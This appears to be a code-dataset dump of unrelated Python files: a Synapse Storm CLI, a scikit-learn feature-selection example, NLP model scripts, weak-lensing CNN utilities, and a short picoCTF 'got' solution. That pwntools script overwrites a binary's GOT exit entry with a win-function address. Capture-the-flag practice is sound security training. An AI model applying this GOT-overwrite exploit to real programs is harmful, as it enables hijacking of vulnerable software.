async for byts in self._cmd_cli.item.getAxonBytes(opts.sha256):
byts = fd.write(byts)
self.printf(f'saved to: {opts.filepath}')
except asyncio.CancelledError as e:
raise
except s_exc.SynErr as e:
self.printf(e.errinfo.get('mesg', str(e)))
class ExportCmd(StormCliCmd):
'''
Export the results of a storm query into a nodes file.
Example:
// Export nodes to a file
!export dnsa.nodes { inet:fqdn#mynodes -> inet:dns:a }
// Export nodes to a file and only include specific tags
!export fqdn.nodes { inet:fqdn#mynodes } --include-tags footag
'''
_cmd_name = '!export'
def getArgParser(self):
pars = StormCliCmd.getArgParser(self)
pars.add_argument('filepath', help='The file path to save the export to.')
pars.add_argument('query', help='The Storm query to export nodes from.')
pars.add_argument('--include-tags', nargs='*', help='Only include the specified tags in output.')
pars.add_argument('--no-tags', default=False, action='store_true', help='Do not include any tags on exported nodes.')
return pars
async def runCmdOpts(self, opts):
self.printf(f'exporting nodes')
queryopts = {}
if opts.include_tags:
queryopts['scrub'] = {'include': {'tags': opts.include_tags}}
if opts.no_tags:
queryopts['scrub'] = {'include': {'tags': []}}
try:
query = opts.query[1:-1]
with s_common.genfile(opts.filepath) as fd:
cnt = 0
async for pode in self._cmd_cli.item.exportStorm(query, opts=queryopts):
byts = fd.write(s_msgpack.en(pode))
cnt += 1
self.printf(f'saved {cnt} nodes to: {opts.filepath}')
except asyncio.CancelledError as e:
raise
except s_exc.SynErr as e:
self.printf(e.errinfo.get('mesg', str(e)))
class StormCli(s_cli.Cli):
histfile = 'storm_history'
async def __anit__(self, item, outp=s_output.stdout, opts=None):
await s_cli.Cli.__anit__(self, item, outp=outp)
self.indented = False
self.cmdprompt = 'storm> '
self.stormopts = {'repr': True}
self.hidetags = False
self.hideprops = False
self._print_skips = []
def initCmdClasses(self):
self.addCmdClass(QuitCmd)
self.addCmdClass(HelpCmd)
self.addCmdClass(ExportCmd)
self.addCmdClass(RunFileCmd)
self.addCmdClass(PullFileCmd)
self.addCmdClass(PushFileCmd)
def printf(self, mesg, addnl=True, color=None):
if self.indented:
s_cli.Cli.printf(self, '')
self.indented = False
return s_cli.Cli.printf(self, mesg, addnl=addnl, color=color)
async def runCmdLine(self, line, opts=None):
if line[0] == '!':
return await s_cli.Cli.runCmdLine(self, line)
await self.storm(line, opts=opts)
async def handleErr(self, mesg):
err = mesg[1]
if err[0] == 'BadSyntax':
pos = err[1].get('at', None)
text = err[1].get('text', None)
tlen = len(text)
mesg = err[1].get('mesg', None)
if pos is not None and text is not None and mesg is not None:
text = text.replace('\n', ' ')
# Handle too-long text
if tlen > 60:
text = text[max(0, pos - 30):pos + 30]
if pos < tlen - 30:
text += '...'
if pos > 30:
text = '...' + text
pos = 33
self.printf(text)
self.printf(f'{" " * pos}^')
self.printf(f'Syntax Error: {mesg}', color=ERROR_COLOR)
return
text = err[1].get('mesg', err[0])
self.printf(f'ERROR: {text}', color=ERROR_COLOR)
def _printNodeProp(self, name, valu):
self.printf(f' {name} = {valu}')
async def storm(self, text, opts=None):
realopts = copy.deepcopy(self.stormopts)
if opts is not None:
realopts.update(opts)
async for mesg in self.item.storm(text, opts=realopts):
mtyp = mesg[0]
if mtyp in self._print_skips:
continue
if mtyp == 'node':
node = mesg[1]
formname, formvalu = s_node.reprNdef(node)
self.printf(f'{formname}={formvalu}')
if not self.hideprops:
for name in sorted(s_node.props(node).keys()):
valu = s_node.reprProp(node, name)
if name[0] != '.':
name = ':' + name
self._printNodeProp(name, valu)
if not self.hidetags:
for tag in sorted(s_node.tagsnice(node)):
valu = s_node.reprTag(node, tag)
tprops = s_node.reprTagProps(node, tag)
printed = False
if valu:
self.printf(f' #{tag} = {valu}')
printed = True
if tprops:
for prop, pval in tprops:
self.printf(f' #{tag}:{prop} = {pval}')
printed = True
if not printed:
self.printf(f' #{tag}')
elif mtyp == 'node:edits':
edit = mesg[1]
count = sum(len(e[2]) for e in edit.get('edits', ()))
s_cli.Cli.printf(self, '.' * count, addnl=False, color=NODEEDIT_COLOR)
self.indented = True
elif mtyp == 'fini':
took = mesg[1].get('took')
took = max(took, 1)
count = mesg[1].get('count')
pers = float(count) / float(took / 1000)
self.printf('complete. %d nodes in %d ms (%d/sec).' % (count, took, pers))
elif mtyp == 'print':
self.printf(mesg[1].get('mesg'))
elif mtyp == 'warn':
info = mesg[1]
warn = info.pop('mesg', '')
xtra = ', '.join([f'{k}={v}' for k, v in info.items()])
if xtra:
warn = ' '.join([warn, xtra])
self.printf(f'WARNING: {warn}', color=WARNING_COLOR)
elif mtyp == 'err':
await self.handleErr(mesg)
def getArgParser():
pars = argparse.ArgumentParser(prog='synapse.tools.storm')
pars.add_argument('cortex', help='A telepath URL for the Cortex.')
pars.add_argument('onecmd', nargs='?', help='A single storm command to run and exit.')
return pars
async def main(argv, outp=s_output.stdout):
pars = getArgParser()
opts = pars.parse_args(argv)
path = s_common.getSynPath('telepath.yaml')
telefini = await s_telepath.loadTeleEnv(path)
async with await s_telepath.openurl(opts.cortex) as proxy:
if telefini is not None:
proxy.onfini(telefini)
async with await StormCli.anit(proxy, outp=outp, opts=opts) as cli:
if opts.onecmd:
await cli.runCmdLine(opts.onecmd)
return
# pragma: no cover
cli.colorsenabled = True
cli.printf(welcome)
await cli.addSignalHandlers()
await cli.runCmdLoop()
if __name__ == '__main__': # pragma: no cover
sys.exit(asyncio.run(main(sys.argv[1:])))
| 29.589421
| 125
| 0.556823
| 1,397
| 11,747
| 4.600573
| 0.212598
| 0.034231
| 0.029096
| 0.014003
| 0.170842
| 0.137078
| 0.137078
| 0.129298
| 0.118718
| 0.118718
| 0
| 0.016973
| 0.327914
| 11,747
| 396
| 126
| 29.664141
| 0.797087
| 0.07338
| 0
| 0.164659
| 0
| 0
| 0.132979
| 0.001957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040161
| false
| 0
| 0.064257
| 0
| 0.216867
| 0.144578
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1dcbdb70b490e3b7a9741698dbd0c921ce6d7ff
| 374
|
py
|
Python
|
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | null | null | null |
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | null | null | null |
Feature Selection/variance-thresholding-binary-features.py
|
WyckliffeAluga/data-chronicles
|
5219fe9cdbafb9fd7be88727483952c4c13f2790
|
[
"MIT"
] | 1
|
2021-02-09T12:22:55.000Z
|
2021-02-09T12:22:55.000Z
|
from sklearn.feature_selection import VarianceThreshold
# Create feature matrix with:
# Feature 0: 80% class 0
# Feature 1: 80% class 1
# Feature 2: 60% class 0, 40% class 1
X = [[0, 1, 0],
[0, 1, 1],
[0, 1, 0],
[0, 1, 1],
[1, 0, 0]]
# Run threshold by variance
thresholder = VarianceThreshold(threshold=(.75 * (1 - .75)))
thresholder.fit_transform(X)
| 23.375
| 60
| 0.628342
| 58
| 374
| 4.017241
| 0.431034
| 0.034335
| 0.038627
| 0.034335
| 0.051502
| 0.051502
| 0
| 0
| 0
| 0
| 0
| 0.119863
| 0.219251
| 374
| 15
| 61
| 24.933333
| 0.678082
| 0.360963
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1dd06b091ae6fa97dc90f3e28bc1d5770af8082
| 1,677
|
py
|
Python
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 157
|
2019-05-11T21:17:20.000Z
|
2022-03-21T12:05:12.000Z
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 10
|
2019-05-14T19:49:04.000Z
|
2021-06-03T13:15:16.000Z
|
scripts/03_BuildLITypeModels/14_TrainLemmaModel.py
|
danielplatt/LemmInflect
|
7db0633098409800fbe7056bdab7d6f5f144cebb
|
[
"MIT"
] | 20
|
2019-08-21T12:40:51.000Z
|
2021-10-02T15:06:07.000Z
|
#!/usr/bin/python3
import sys
sys.path.insert(0, '../..') # make '..' first in the lib search path
import gzip
import numpy
from lemminflect.kmodels.ModelLemma import ModelLemma
from lemminflect.kmodels.ModelLemmaInData import ModelLemmaInData
from lemminflect.kmodels.ModelLemmaClasses import ModelLemmaClasses
from lemminflect import config
if __name__ == '__main__':
# Load the lemmatization data
print('Loading ', config.lemma_tcorp_fn)
indata = ModelLemmaInData(config.lemma_tcorp_fn)
print('Loaded {:,} entries'.format(len(indata.entries)))
# Load the lemmatization rules
print('Loading ', config.model_lemma_cl_fn)
rules = ModelLemmaClasses(config.model_lemma_cl_fn)
# Convert data into training format
X = []
Y = []
input_len = ModelLemmaInData.WVEC_LEN
input_letters = ModelLemmaInData.getLetterClasses()
output_rules = rules.rules
for entry in indata.entries:
rule = ModelLemmaClasses.computeSuffixRule(entry.infl, entry.lemma)
idx = rules.getRuleIndex(rule)
vec = ModelLemmaInData.wordToVec(entry.infl, entry.category)
X.append( vec )
Y.append( idx )
X = numpy.asarray(X, dtype='float32')
Y = numpy.asarray(Y, dtype='int32')
print('X.shape= ', X.shape)
print('Y.shape= ', Y.shape)
print()
# Create the model
batch_size = 32
nepochs = 50
model = ModelLemma()
model.create(input_len, input_letters, output_rules)
model.model.summary()
model.train(X, Y, batch_size, nepochs)
print()
print('Saving model to ', config.model_lemma_fn)
model.save(config.model_lemma_fn)
print('done')
| 31.641509
| 75
| 0.690519
| 203
| 1,677
| 5.551724
| 0.394089
| 0.053239
| 0.056788
| 0.031943
| 0.035492
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007468
| 0.20155
| 1,677
| 52
| 76
| 32.25
| 0.834205
| 0.097794
| 0
| 0.05
| 0
| 0
| 0.06503
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.175
| 0
| 0.175
| 0.225
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1dd06cdb53d42d5c3f71ef66179e31f525e4e55
| 9,006
|
py
|
Python
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 14
|
2019-04-17T15:10:39.000Z
|
2022-02-14T09:38:47.000Z
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4
|
2019-04-07T19:36:24.000Z
|
2020-05-28T12:46:37.000Z
|
python/snips_nlu_parsers/builtin_entities.py
|
f-laurens/snips-nlu-parsers
|
82d24c0b4258acd1191af5d558b7592a18f2dada
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 43
|
2019-04-20T07:31:57.000Z
|
2022-01-12T16:24:13.000Z
|
# coding=utf-8
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
from _ctypes import byref, pointer
from builtins import range, str
from ctypes import c_char_p, string_at
from snips_nlu_parsers.utils import (CStringArray, check_ffi_error, lib,
string_array_pointer, string_pointer)
_ALL_LANGUAGES = None
_SUPPORTED_ENTITIES = dict()
_SUPPORTED_GAZETTEER_ENTITIES = dict()
_SUPPORTED_GRAMMAR_ENTITIES = dict()
_ENTITIES_EXAMPLES = dict()
_ALL_BUILTIN_ENTITIES = None
_ALL_GAZETTEER_ENTITIES = None
_ALL_GRAMMAR_ENTITIES = None
_BUILTIN_ENTITIES_SHORTNAMES = dict()
_COMPLETE_ENTITY_ONTOLOGY = None
_LANGUAGE_ENTITY_ONTOLOGY = dict()
def get_all_languages():
"""Lists all the supported languages"""
global _ALL_LANGUAGES
if _ALL_LANGUAGES is None:
lib.snips_nlu_ontology_supported_languages.restype = CStringArray
array = lib.snips_nlu_ontology_supported_languages()
_ALL_LANGUAGES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_LANGUAGES
def get_all_builtin_entities():
"""Lists the builtin entities that are supported in at least one
language"""
global _ALL_BUILTIN_ENTITIES
if _ALL_BUILTIN_ENTITIES is None:
lib.snips_nlu_ontology_all_builtin_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_builtin_entities()
_ALL_BUILTIN_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_BUILTIN_ENTITIES
def get_all_gazetteer_entities():
"""Lists the gazetteer entities that are supported in at least one
language"""
global _ALL_GAZETTEER_ENTITIES
if _ALL_GAZETTEER_ENTITIES is None:
lib.snips_nlu_ontology_all_gazetteer_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_gazetteer_entities()
_ALL_GAZETTEER_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_GAZETTEER_ENTITIES
def get_all_grammar_entities():
"""Lists the grammar entities that are supported in at least one
language"""
global _ALL_GRAMMAR_ENTITIES
if _ALL_GRAMMAR_ENTITIES is None:
lib.snips_nlu_ontology_all_grammar_entities.restype = CStringArray
array = lib.snips_nlu_ontology_all_grammar_entities()
_ALL_GRAMMAR_ENTITIES = set(
array.data[i].decode("utf8") for i in range(array.size))
return _ALL_GRAMMAR_ENTITIES
def get_builtin_entity_shortname(entity):
"""Get the short name of the entity
Examples:
>>> get_builtin_entity_shortname(u"snips/amountOfMoney")
'AmountOfMoney'
"""
global _BUILTIN_ENTITIES_SHORTNAMES
if entity not in _BUILTIN_ENTITIES_SHORTNAMES:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_ontology_entity_shortname(
entity.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"builtin entity shortname")
result = string_at(ptr)
_BUILTIN_ENTITIES_SHORTNAMES[entity] = result.decode("utf8")
return _BUILTIN_ENTITIES_SHORTNAMES[entity]
def get_supported_entities(language):
"""Lists the builtin entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_supported_builtin_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported entities")
array = ptr.contents
_SUPPORTED_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_ENTITIES[language]
def get_supported_gazetteer_entities(language):
"""Lists the gazetteer entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_GAZETTEER_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_GAZETTEER_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = \
lib.snips_nlu_parsers_supported_builtin_gazetteer_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported gazetteer entities")
array = ptr.contents
_SUPPORTED_GAZETTEER_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_GAZETTEER_ENTITIES[language]
def get_supported_grammar_entities(language):
"""Lists the grammar entities supported in the specified *language*
Returns:
list of str: the list of entity labels
"""
global _SUPPORTED_GRAMMAR_ENTITIES
if not isinstance(language, str):
raise TypeError("Expected language to be of type 'str' but found: %s"
% type(language))
if language not in _SUPPORTED_GRAMMAR_ENTITIES:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_supported_grammar_entities(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"supported grammar entities")
array = ptr.contents
_SUPPORTED_GRAMMAR_ENTITIES[language] = set(
array.data[i].decode("utf8") for i in range(array.size))
return _SUPPORTED_GRAMMAR_ENTITIES[language]
def get_builtin_entity_examples(builtin_entity_kind, language):
"""Provides some examples of the builtin entity in the specified language
"""
global _ENTITIES_EXAMPLES
if not isinstance(builtin_entity_kind, str):
raise TypeError("Expected `builtin_entity_kind` to be of type 'str' "
"but found: %s" % type(builtin_entity_kind))
if not isinstance(language, str):
raise TypeError("Expected `language` to be of type 'str' but found: %s"
% type(language))
if builtin_entity_kind not in _ENTITIES_EXAMPLES:
_ENTITIES_EXAMPLES[builtin_entity_kind] = dict()
if language not in _ENTITIES_EXAMPLES[builtin_entity_kind]:
with string_array_pointer(pointer(CStringArray())) as ptr:
exit_code = lib.snips_nlu_parsers_builtin_entity_examples(
builtin_entity_kind.encode("utf8"),
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"builtin entity examples")
array = ptr.contents
_ENTITIES_EXAMPLES[builtin_entity_kind][language] = list(
array.data[i].decode("utf8") for i in range(array.size))
return _ENTITIES_EXAMPLES[builtin_entity_kind][language]
def get_complete_entity_ontology():
"""Lists the complete entity ontology for all languages in JSON format
"""
global _COMPLETE_ENTITY_ONTOLOGY
if _COMPLETE_ENTITY_ONTOLOGY is None:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_parsers_complete_entity_ontology_json(byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"complete entity ontology")
json_str = string_at(ptr).decode("utf8")
_COMPLETE_ENTITY_ONTOLOGY = json.loads(json_str, encoding="utf8")
return _COMPLETE_ENTITY_ONTOLOGY
def get_language_entity_ontology(language):
"""Lists the complete entity ontology for the specified language in JSON format
"""
global _LANGUAGE_ENTITY_ONTOLOGY
if language not in _LANGUAGE_ENTITY_ONTOLOGY:
with string_pointer(c_char_p()) as ptr:
exit_code = lib.snips_nlu_parsers_language_entity_ontology_json(
language.encode("utf8"), byref(ptr))
check_ffi_error(exit_code, "Something went wrong when retrieving "
"language entity ontology")
json_str = string_at(ptr).decode("utf8")
_LANGUAGE_ENTITY_ONTOLOGY[language] = json.loads(json_str, encoding="utf8")
return _LANGUAGE_ENTITY_ONTOLOGY[language]
| 40.751131
| 87
| 0.67777
| 1,069
| 9,006
| 5.379794
| 0.1029
| 0.053208
| 0.028691
| 0.029734
| 0.623022
| 0.58216
| 0.532603
| 0.50113
| 0.482351
| 0.435055
| 0
| 0.003106
| 0.249167
| 9,006
| 220
| 88
| 40.936364
| 0.847382
| 0.108039
| 0
| 0.293333
| 0
| 0
| 0.098116
| 0.002655
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073333
| false
| 0
| 0.04
| 0
| 0.186667
| 0.006667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1decafed3dd9912b1ab456a5f7d5b245e48033e
| 521
|
py
|
Python
|
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | 9
|
2021-04-20T15:28:36.000Z
|
2022-03-08T19:53:48.000Z
|
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | null | null | null |
picoctf-2019/got/shellcode.py
|
onealmond/hacking-lab
|
631e615944add02db3c2afef47bf1de7171eb065
|
[
"MIT"
] | 6
|
2021-06-24T03:25:21.000Z
|
2022-02-20T21:44:52.000Z
|
import os;os.environ['TMPDIR'] = os.path.join(os.environ['HOME'], 'tmp')
import pwn
remote_binary = "/problems/got_5_c5119617c90aa544a639812dbc41e24e/vuln"
def segfault():
try:
pr = pwn.process(remote_binary)
elf = pwn.ELF(remote_binary, False)
print(elf.got)
pr.sendlineafter("Input address\n", str(elf.got["exit"]))
pr.sendlineafter("Input value?\n", str(elf.sym["win"]))
rsp = pr.readall(timeout=0.5)
print(rsp)
finally:
pr.close()
segfault()
| 27.421053
| 72
| 0.629559
| 68
| 521
| 4.75
| 0.573529
| 0.111455
| 0.123839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06068
| 0.209213
| 521
| 18
| 73
| 28.944444
| 0.723301
| 0
| 0
| 0
| 0
| 0
| 0.195777
| 0.101727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.133333
| 0
| 0.2
| 0.133333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1e15b839857a50eb242db9bce20dc2231b79a03
| 9,518
|
py
|
Python
|
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
miscellaneous/utils.py
|
tingyuansen/Weak_Lensing
|
f8f0833345687648c467b4dea7074d9596c81c14
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# *Author: Dezso Ribli*
"""
Util functions for training CNN on weak lesnsing maps.
Mostly data loaders and data generators with some
additional functionality.
"""
import numpy as np
# https://github.com/IntelPython/mkl_fft/issues/11
#np.fft.restore_all()
import cv2
import math
import os
def step_decay(epoch, base_lr, epochs_drop, drop=0.1):
"""Helper for step learning rate decay."""
lrate = base_lr
for epoch_drop in epochs_drop:
lrate *= math.pow(drop,math.floor(epoch/epoch_drop))
return lrate
def load_training_data(mapsize=512, grfized=False, exclude_fid=False,
dense_grid=False, random_split=False,
from_files=False):
"""Load data for different training scenarios."""
if not grfized and (not dense_grid) and (not random_split):
# the default data to loas
X_train, X_test, y_train, y_test = load_sparse_grid(imsize=mapsize,
from_files=from_files)
elif grfized:
# equivalent gaussian random filed maps
assert not from_files
X_train, X_test, y_train, y_test = load_grf_sparse_grid()
elif dense_grid:
assert not from_files
# data with additional points around a cosmology
X_train, X_test, y_train, y_test = load_dense_grid(imsize=mapsize)
elif random_split:
# random train and test split
X_train, X_test, y_train, y_test = load_randomsplit_grid(
imsize=mapsize, from_files=from_files)
# aleays predict newidf, why not, it takes not time
# anyway we will not use it with the experiemnts
fn = '../../data/columbia_data_fiducial_new_idf_pix'+str(mapsize)+'.npy'
X_new_idf = np.load(fn)
y_new_idf = np.ones((len(y_test),2))
y_new_idf[:,0], y_new_idf[:,1] = 0.309, 0.816
if exclude_fid: # exclude fiducial cosmo params if asked for
idx = (y_train[:,0] == 0.309) & (y_train[:,1] == 0.816)
X_train, y_train = X_train[~idx], y_train[~idx]
return X_train, X_test, X_new_idf, y_train, y_test, y_new_idf
def load_sparse_grid(d='../../data/sparsegrid/', imsize = 512,
from_files=False):
if from_files: # only load filenames
X_train = np.arange(len(os.listdir(os.path.join(d, 'train'))))
X_test = np.arange(len(os.listdir(os.path.join(d, 'test'))))
else: # load the files themselves
X_train = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'sparse_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
"""Loaders for various experiments."""
def load_grf_sparse_grid(d='../../data/grf/', case='a',imsize=512):
X_train = np.load(d+'grf'+case+'_sparse_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'grf'+case+'_sparse_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'grf_sparse_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'grf_sparse_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
def load_dense_grid(d='../../data/densegrid/', imsize = 512):
X_train = np.load(d+'dense_grid_final_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'dense_grid_final_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'dense_grid_final_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'dense_grid_final_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
def load_randomsplit_grid(d='../../data/randomsplit/sparse_512/', imsize = 512,
from_files=False):
if from_files: # only load filenames
X_train = np.arange(len(os.listdir(os.path.join(d, 'train'))))
X_test = np.arange(len(os.listdir(os.path.join(d, 'test'))))
else: # load the files themselves
X_train = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_x_train.npy')
X_test = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_x_test.npy')
y_train = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_y_train.npy')
y_test = np.load(d+'sparse_randomsplit_'+str(imsize)+'pix_y_test.npy')
return X_train, X_test, y_train, y_test
class DataGenerator():
"""
Data generator.
Generates minibatches of data and labels.
Usage:
from imgen import ImageGenerator
g = DataGenerator(data, labels)
"""
def __init__(self, x, y, batch_size=1, shuffle=True, seed=0,
ng=None, smoothing = None, map_size = 512,
y_shape = (2,), augment = False, scale = 60*3.5,
d = None, from_files=False):
"""Initialize data generator."""
self.x, self.y = x, y
self.from_files = from_files
self.d = d
self.batch_size = batch_size
self.x_shape, self.y_shape = (map_size, map_size, 1), y_shape
self.shuffle = shuffle
self.augment = augment
self.seed = seed
self.rng = np.random.RandomState(self.seed)
if not from_files:
assert x.shape[1] == x.shape[2] # rectangular!!!
self.A_pix = (float(scale)/map_size)**2
self.ng = ng
self.smoothing = smoothing
self.scale = float(scale)
self.n_data = len(x)
self.n_steps = len(x)//batch_size + (len(x) % batch_size > 0)
self.i = 0
self.reset_indices_and_reshuffle(force=True)
def reset_indices_and_reshuffle(self, force=False):
"""Reset indices and reshuffle images when needed."""
if self.i == self.n_data or force:
if self.shuffle:
self.index = self.rng.permutation(self.n_data)
else:
self.index = np.arange(self.n_data)
self.i = 0
def next(self):
"""Get next batch of images."""
x = np.zeros((self.batch_size,)+self.x_shape)
y = np.zeros((self.batch_size,)+self.y_shape)
for i in range(self.batch_size):
x[i],y[i] = self.next_one()
return x,y
def next_one(self):
"""Get next 1 image."""
# reset index, reshuffle if necessary
self.reset_indices_and_reshuffle()
# get next x
if not self.from_files: # simply index from array
x = self.x[self.index[self.i]]
else: # load from file
fn = str(self.x[self.index[self.i]]) + '.npy'
x = np.load(os.path.join(self.d, fn))
x = self.process_map(x)
y = self.y[[self.index[self.i]]]
self.i += 1 # increment counter
return x, y
def process_map(self, x_in):
"""Process data."""
x = np.array([x_in],copy=True)
if self.augment: # flip and transpose
x = aug_ims(x, self.rng.rand()>0.5, self.rng.rand()>0.5,
self.rng.rand()>0.5)
if self.ng: # add noise if ng is not None
x = add_shape_noise(x, self.A_pix, self.ng, self.rng)
if self.smoothing: # smooth if smoothing is not None
x[0,:,:,0] = smooth(x[0,:,:,0], self.smoothing, self.scale)
return x
def predict_on_generator(model, datagen, augment):
"""Predict on data generator with augmentation."""
datagen.reset_indices_and_reshuffle(force=True)
y_true, y_pred = [],[]
for i in range(datagen.n_data):
xi,yi = datagen.next()
y_true.append(yi)
y_pred_tmp = np.zeros(yi.shape)
if augment:
for ai in [0,1]:
for aj in [0,1]:
for ak in [0,1]:
y_pred_tmp += model.predict_on_batch(
aug_ims(xi,ai,aj,ak))
y_pred.append(y_pred_tmp/8.)
else:
y_pred.append(model.predict_on_batch(xi))
y_true = np.vstack(y_true)
y_pred = np.vstack(y_pred)
return y_true, y_pred
def aug_ims(ims, fliplr=0, flipud=0, T=0):
"""Augment images with flips and transposition."""
ims_aug = np.array(ims, copy=True)
for i in range(len(ims_aug)):
if fliplr: # flip left right
ims_aug[i] = np.fliplr(ims_aug[i])
if flipud: # flip up down
ims_aug[i] = np.flipud(ims_aug[i])
if T: # transpose
ims_aug[i,:,:,0] = ims_aug[i,:,:,0].T
return ims_aug
def add_shape_noise(x, A, ng, rng=None, sige=0.4):
"""Add shape noise"""
sigpix = sige / (2 * A * ng)**0.5 # final pixel noise scatter
# add shape noise to map
if rng: # use given random generator
return x + rng.normal(loc=0, scale=sigpix, size=x.shape)
else: # or just a random noise
return x + np.random.normal(loc=0, scale=sigpix, size=x.shape)
